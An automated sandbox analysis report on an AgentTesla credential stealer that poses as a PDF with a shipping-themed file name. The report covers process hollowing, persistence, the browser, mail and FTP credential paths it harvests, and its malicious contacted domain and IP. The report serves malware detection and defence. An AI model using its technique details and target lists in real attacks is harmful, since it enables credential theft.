    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_03F93520 mov eax, dword ptr fs:[00000030h]8_2_03F93520
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_03F93580 mov eax, dword ptr fs:[00000030h]8_2_03F93580
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041F250 SetUnhandledExceptionFilter,6_2_0041F250
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0041A208
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00417DAA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Maps a DLL or memory area into another process
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
    Sample uses process hollowing technique
    Source: C:\Users\user\AppData\Local\directory\name.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000Jump to behavior
    Writes to foreign memory regions
    Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 91C008Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA8008Jump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
    Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
    Source: INDIA - VSL PARTICULARS.pdf.exe, name.exeBinary or memory string: Shell_TrayWnd
    Source: INDIA - VSL PARTICULARS.pdf.exe, name.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected AgentTesla
    Source: Yara matchFile source: dump.pcap, type: PCAP
    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
    Tries to steal Mail credentials (via file / registry access)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
    Source: name.exeBinary or memory string: WIN_XP
    Source: name.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
    Source: name.exeBinary or memory string: WIN_XPe
    Source: name.exeBinary or memory string: WIN_VISTA
    Source: name.exeBinary or memory string: WIN_7
    Source: name.exeBinary or memory string: WIN_8

    Remote Access Functionality

    barindex
    Yara detected AgentTesla
    Source: Yara matchFile source: dump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,6_2_004652BE
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00476619
    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 6_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,6_2_0046CEF3

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information111
    Scripting    		2
    Valid Accounts    		121
    Windows Management Instrumentation    		111
    Scripting    		1
    Exploitation for Privilege Escalation    		11
    Disable or Modify Tools    		2
    OS Credential Dumping    		2
    System Time Discovery    		Remote Services1
    Archive Collected Data    		2
    Ingress Tool Transfer    		1
    Exfiltration Over Alternative Protocol    		1
    System Shutdown/Reboot
    CredentialsDomainsDefault Accounts2
    Native API    		1
    DLL Side-Loading    		1
    DLL Side-Loading    		1
    Deobfuscate/Decode Files or Information    		21
    Input Capture    		1
    Account Discovery    		Remote Desktop Protocol2
    Data from Local System    		11
    Encrypted Channel    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Shared Modules    		2
    Valid Accounts    		2
    Valid Accounts    		12
    Obfuscated Files or Information    		1
    Credentials in Registry    		3
    File and Directory Discovery    		SMB/Windows Admin Shares1
    Email Collection    		1
    Non-Standard Port    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    Command and Scripting Interpreter    		2
    Registry Run Keys / Startup Folder    		21
    Access Token Manipulation    		1
    DLL Side-Loading    		NTDS128
    System Information Discovery    		Distributed Component Object Model21
    Input Capture    		2
    Non-Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
    Process Injection    		11
    Masquerading    		LSA Secrets331
    Security Software Discovery    		SSH3
    Clipboard Data    		23
    Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
    Registry Run Keys / Startup Folder    		2
    Valid Accounts    		Cached Domain Credentials121
    Virtualization/Sandbox Evasion    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
    Virtualization/Sandbox Evasion    		DCSync2
    Process Discovery    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
    Access Token Manipulation    		Proc Filesystem11
    Application Window Discovery    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
    Process Injection    		/etc/passwd and /etc/shadow1
    System Owner/User Discovery    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
    System Network Configuration Discovery    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519011 Sample: INDIA - VSL PARTICULARS.pdf.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 42 beirutrest.com 2->42 44 api.ipify.org 2->44 58 Suricata IDS alerts for network traffic 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 9 other signatures 2->64 10 INDIA - VSL PARTICULARS.pdf.exe 3 2->10         started        13 wscript.exe 1 2->13         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...\name.exe, PE32 10->40 dropped 16 name.exe 1 10->16         started        82 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->82 20 name.exe 13->20         started        signatures6 process7 file8 38 C:\Users\user\AppData\Roaming\...\name.vbs, data 16->38 dropped 50 Antivirus detection for dropped file 16->50 52 Multi AV Scanner detection for dropped file 16->52 54 Machine Learning detection for dropped file 16->54 56 4 other signatures 16->56 22 RegSvcs.exe 15 2 16->22         started        26 name.exe 20->26         started        28 RegSvcs.exe 20->28         started        signatures9 process10 dnsIp11 46 beirutrest.com 50.87.144.157, 21, 35284, 49713 UNIFIEDLAYER-AS-1US United States 22->46 48 api.ipify.org 104.26.12.205, 443, 49712, 49718 CLOUDFLARENETUS United States 22->48 74 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 22->74 76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->76 78 Tries to steal Mail credentials (via file / registry access) 22->78 80 Sample uses process hollowing technique 26->80 30 name.exe 26->30         started        33 RegSvcs.exe 26->33         started        signatures12 process13 signatures14 84 Writes to foreign memory regions 30->84 86 Maps a DLL or memory area into another process 30->86 35 RegSvcs.exe 2 30->35         started        process15 signatures16 66 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 35->66 68 Tries to steal Mail credentials (via file / registry access) 35->68 70 Tries to harvest and steal ftp login credentials 35->70 72 Tries to harvest and steal browser information (history, passwords, etc) 35->72

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    INDIA - VSL PARTICULARS.pdf.exe27%VirustotalBrowse
    INDIA - VSL PARTICULARS.pdf.exe100%AviraHEUR/AGEN.1321671
    INDIA - VSL PARTICULARS.pdf.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\directory\name.exe100%AviraHEUR/AGEN.1321671
    C:\Users\user\AppData\Local\directory\name.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\directory\name.exe34%ReversingLabsWin32.Trojan.Generic

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://api.ipify.org/0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    beirutrest.com
    		50.87.144.157
    		truetrue
      		unknown
      api.ipify.org
      		104.26.12.205
      		truefalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://api.ipify.org/false
        • URL Reputation: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        104.26.12.205
        		api.ipify.orgUnited States
        		13335CLOUDFLARENETUSfalse
        50.87.144.157
        		beirutrest.comUnited States
        		46606UNIFIEDLAYER-AS-1UStrue

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1519011
        Start date and time:2024-09-26 05:33:06 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 59s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:INDIA - VSL PARTICULARS.pdf.exe
        Detection:MAL
        Classification:mal100.troj.spyw.expl.evad.winEXE@18/3@2/2
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 56
        • Number of non-executed functions: 308
        Cookbook Comments:
        • Found application associated with file extension: .exe

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        05:34:07AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
        23:34:09API Interceptor1377232x Sleep call for process: RegSvcs.exe modified

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.26.12.205file.exeGet hashmaliciousLummaC, VidarBrowse
        • api.ipify.org/
        SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        file.exeGet hashmaliciousUnknownBrowse
        • api.ipify.org/
        50.87.144.157K. Taean V31 Vessel's Particulars.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
          IMA GLORY PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
            WOOYANG VENUS PARTICULARS.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
              MV TBN 58 SHIP PARTICULARS.01.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                Q88_TAI SHAN - 11.09.24.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                  ZHONG XING HAI PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                    MALED_Q88_10.09.24.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
                      Q88_MT Carol 2024.09.10.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
                        EVER V-2408 - VESSEL DETAILS.xlsx.scr.exeGet hashmaliciousAgentTeslaBrowse
                          CSC LEADER VOY.1 PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            beirutrest.comK. Taean V31 Vessel's Particulars.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 50.87.144.157
                            IMA GLORY PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 50.87.144.157
                            WOOYANG VENUS PARTICULARS.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            MV TBN 58 SHIP PARTICULARS.01.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            Q88_TAI SHAN - 11.09.24.docx.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            ZHONG XING HAI PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            MALED_Q88_10.09.24.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            Q88_MT Carol 2024.09.10.doc.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            EVER V-2408 - VESSEL DETAILS.xlsx.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            CSC LEADER VOY.1 PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.144.157
                            api.ipify.orghttp://limeac-oawkcc-otmsesrt-iond0-minestoasli.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                            • 172.67.74.152
                            https://dreativityblocksnodes.pages.dev/Get hashmaliciousUnknownBrowse
                            • 172.67.74.152
